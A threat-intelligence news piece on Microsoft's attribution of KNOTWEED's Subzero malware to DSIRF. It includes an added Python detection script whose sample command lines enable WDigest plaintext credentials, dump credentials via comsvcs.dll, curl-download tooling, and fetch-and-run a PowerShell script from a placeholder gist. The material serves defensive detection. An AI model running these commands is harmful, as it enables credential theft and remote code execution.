Microsoft reported Subzero attacks against Microsoft customers in Austria, the United Kingdom, and Panama. The targeted entities are law firms, banks, and strategic consultancies. MSTIC states that KNOTWEED’s Subzero malware was deployed in multiple ways; the IT giant refers to the different stages of Subzero as Jumplump (the persistent loader) and Corelump (the main malware).
Once they have compromised a system, the threat actors drop the Corelump downloader and inject it directly into memory to evade detection. It supports multiple features, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED’s C2 server.
Microsoft researchers observed a variety of post-compromise actions on infected systems:
- Setting of UseLogonCredential to “1” to enable plaintext credentials
- Credential dumping via comsvcs.dll
- Attempt to access emails with dumped credentials from a KNOTWEED IP address
- Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
Researchers from threat intelligence firm RiskIQ, using passive DNS data related to Knotweed attacks, linked the C2 infrastructure used by the malware since February 2020 to DSIRF.
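The post-compromise actions listed above are visible in process-creation telemetry (Windows 4688 or Sysmon event 1 command lines). The following is an added detection example, not code from Microsoft or the original article; the rule names, hostnames, users and sample command lines are constructed for illustration.

```python
import re

# One regex per KNOTWEED post-compromise behaviour named in the report.
# Rule names are constructed for this example.
RULES = {
    "wdigest_plaintext_creds": re.compile(
        r"WDigest.*UseLogonCredential.*\b1\b", re.IGNORECASE),
    "comsvcs_minidump": re.compile(
        r"comsvcs(\.dll)?\b.*MiniDump", re.IGNORECASE),
    "curl_vultrobjects": re.compile(
        r"\bcurl\b.*vultrobjects\.com", re.IGNORECASE),
    "powershell_gist": re.compile(
        r"powershell.*gist\.github(usercontent)?\.com", re.IGNORECASE),
}


def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(events):
    """events: iterable of (host, user, cmdline) tuples parsed from
    process-creation logs. Returns one alert dict per matching event."""
    alerts = []
    for host, user, cmdline in events:
        hits = classify(cmdline)
        if hits:
            alerts.append({"host": host, "user": user,
                           "rules": hits, "cmdline": cmdline})
    return alerts


# Constructed sample events; hosts, users, paths and URLs are made up.
SAMPLE_EVENTS = [
    ("WS01", "CORP\\alice",
     'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders'
     '\\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f'),
    ("WS01", "CORP\\alice",
     "rundll32.exe comsvcs.dll, MiniDump <pid> C:\\Users\\Public\\out.dmp full"),
    ("WS02", "CORP\\bob",
     "curl.exe -o C:\\Users\\Public\\t.bin https://bucket.vultrobjects.com/t.bin"),
    ("WS02", "CORP\\bob",
     'powershell.exe -nop -c "iex (iwr https://gist.githubusercontent.com/'
     'placeholder-account/0000/raw/run.ps1)"'),
    ("WS03", "CORP\\carol", "notepad.exe C:\\Users\\carol\\notes.txt"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], ",".join(alert["rules"]))
```

Matches on the WDigest rule deserve a follow-up registry check, since setting UseLogonCredential to 1 re-enables plaintext credential caching until it is reverted to 0.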
One of the zero-day exploits used in Knotweed attacks targeted the recently patched CVE-2022-22047 vulnerability. The attackers used this exploit to escalate privileges, escape sandboxes, and gain system-level code execution on the vulnerable system.
Microsoft: Windows, Adobe Zero-Days Used to Deploy Subzero Malware
Microsoft has linked a threat group known as Knotweed to an Austrian spyware vendor also operating as a cyber mercenary outfit named DSIRF that targets European and Central American entities using a malware toolset dubbed Subzero.
On its website, DSIRF promotes itself as a company that provides information research, forensics, and data-driven intelligence services to corporations.
However, it has been linked to the development of the Subzero malware that its customers can use to hack targets’ phones, computers, and network and internet-connected devices.